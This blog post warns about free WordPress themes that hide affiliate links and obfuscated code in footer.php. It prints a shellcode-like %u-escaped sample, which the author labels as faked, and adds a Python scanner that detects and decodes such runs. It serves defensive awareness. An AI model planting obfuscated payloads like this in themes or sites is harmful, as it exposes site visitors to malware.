There are now several sites offering free WordPress themes for downloads. Many are excellent, but if you decide to use one on your WP site, it might pay to check the template closely.
For instance, I downloaded one last year; when I had it up on the site and was checking it, I noticed a strange link in the footer, in a very small font. Checking it, I found it was an affiliate link leading to a site selling fake pharmaceuticals. People browsing my site could have clicked on it out of curiosity and rewarded some spammer.
That one was easy to deal with, but the next “booby-trapped” template I came across was very different. It was a good-looking, beautifully produced template with a high “wow!” factor; I wondered why the designer was giving it away, when plenty of people would have been happy to pay for such a great piece of design. It was only when I opened up the template’s footer.php to paste in a Google ad that I realised why it was being given away.
Viewed in the browser, the footer looked perfectly normal, with just the usual WordPress and designer links; the source code, however, revealed a mass of obfuscated code looking like this:
%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0 320 u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2 uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B
%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B
%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A
%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B
%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40
%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u 8304
%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u 8BFF
%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%u BF5D
%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%u D0FF
%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%u FFFF
%u7468%u7074%u2F3A%u362F%u2E36%u
(the code shown here is faked, for illustration)
Obfuscated code is where each character is replaced by its HTML character entity: ‘&’ is replaced by &amp;, for instance. It’s unreadable to humans, but the browser decodes it automatically. Then, depending on what the decoded code is, the browser will either display it as text or execute it.
It’s a technique that’s often used to disguise email addresses on web pages; however, there’s normally no need to disguise URLs. I didn’t know what the code was intended to do, but there was no reason for it to be there, and it could very well have made my site a channel to drop malware onto the PCs of anyone viewing it. So I deleted it straight away. I did email the template’s designer about it, but I’m still waiting for a reply, weeks later.
So, although there are loads of perfectly good, safe WP themes out there, check every one that you decide to use, just in case. Malware/spyware writers are clearly getting slicker in their approach.
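A small checker of the kind this post recommends, added here as an example and not code from the post or from any theme. It flags the two things described above: links hidden with a tiny font or hidden styling, and long runs of encoded characters, decoding them so you can see what they say. It handles the HTML numeric entities the text describes and also the %uXXXX escapes the sample blob uses (the form JavaScript’s unescape() decodes). The footer fragment inside it is constructed for the demo; scanning a real theme is done by passing its directory on the command line.

```python
import re
from html import unescape
from pathlib import Path

# Constructed sample footer (not any real theme): a 1px affiliate link, a %u-escaped
# string fed to unescape(), and a run of numeric HTML entities.
SAMPLE_FOOTER = """
<div id="footer">Powered by WordPress | Design by Example</div>
<a href="http://example.invalid/aff?id=123" style="font-size:1px">pills</a>
<script>document.write(unescape("%u003c%u0061%u0020%u0068%u0072%u0065%u0066%u003e"))</script>
<p>&#104;&#116;&#116;&#112;&#58;</p>
"""

# Four or more consecutive escapes is the threshold for "a run" here; tune to taste.
PERCENT_U = re.compile(r'(?:%u[0-9A-Fa-f]{4}){4,}')
NUM_ENTITY = re.compile(r'(?:&#x?[0-9A-Fa-f]+;){4,}')
HIDDEN_LINK = re.compile(
    r'<a\b[^>]*style="[^"]*(?:font-size\s*:\s*[0-2](?:\.\d+)?px'
    r'|display\s*:\s*none|visibility\s*:\s*hidden)[^"]*"[^>]*>', re.I)

def decode_percent_u(run: str) -> str:
    """Decode %uXXXX escapes into text, as JavaScript's unescape() would."""
    return ''.join(chr(int(h, 16)) for h in re.findall(r'%u([0-9A-Fa-f]{4})', run))

def scan_theme_file(text: str) -> list:
    """Return (kind, detail) findings for one file's contents, in source order per kind."""
    findings = []
    for m in HIDDEN_LINK.finditer(text):
        findings.append(('hidden-link', m.group(0)))
    for m in PERCENT_U.finditer(text):
        findings.append(('percent-u', decode_percent_u(m.group(0))))
    for m in NUM_ENTITY.finditer(text):
        findings.append(('entity-run', unescape(m.group(0))))
    return findings

def scan_directory(root: str) -> dict:
    """Scan every .php file under a theme directory; returns {path: findings}."""
    results = {}
    for path in Path(root).rglob('*.php'):
        found = scan_theme_file(path.read_text(errors='replace'))
        if found:
            results[str(path)] = found
    return results

if __name__ == '__main__':
    import sys
    for path, found in scan_directory(sys.argv[1] if len(sys.argv) > 1 else '.').items():
        for kind, detail in found:
            print(f'{path}: {kind}: {detail[:80]!r}')
```

A hit is something to read by hand, not proof of malice: decoded output that is just an email address is the legitimate use the post mentions, while a decoded script or URL you did not put there is the case to remove.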